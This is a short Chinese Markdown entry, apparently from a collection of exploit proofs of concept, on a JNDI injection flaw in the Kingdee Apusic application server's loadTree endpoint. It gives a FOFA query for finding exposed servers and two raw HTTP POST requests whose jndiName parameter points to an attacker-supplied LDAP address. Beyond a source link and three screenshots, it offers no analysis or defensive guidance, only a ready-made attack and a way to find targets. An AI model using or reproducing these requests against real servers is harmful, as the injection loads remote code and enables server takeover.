29 lines
720 B
Markdown
29 lines
720 B
Markdown
|
|
## 金蝶Apusic应用服务器loadTree JNDI注入漏洞
|
||
|
|
|
||
|
|
## fofa
|
||
|
|
```
|
||
|
|
app="Apusic应用服务器"
|
||
|
|
```
|
||
|
|
|
||
|
|
## poc
|
||
|
|
```
|
||
|
|
POST /appmonitor/protect/jndi/loadTree HTTP/1.1
|
||
|
|
host:127.0.0.1
|
||
|
|
|
||
|
|
jndiName==ldap://地址
|
||
|
|
|
||
|
|
POST /admin/protect/jndi/loadTree HTTP/1.1
|
||
|
|
host:127.0.0.1
|
||
|
|
|
||
|
|
jndiName==ldap://地址
|
||
|
|
```
|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|
##漏洞来源
|
||
|
|
- https://mp.weixin.qq.com/s/iEHmFOKq5LT2x9Hp1ysLIw
|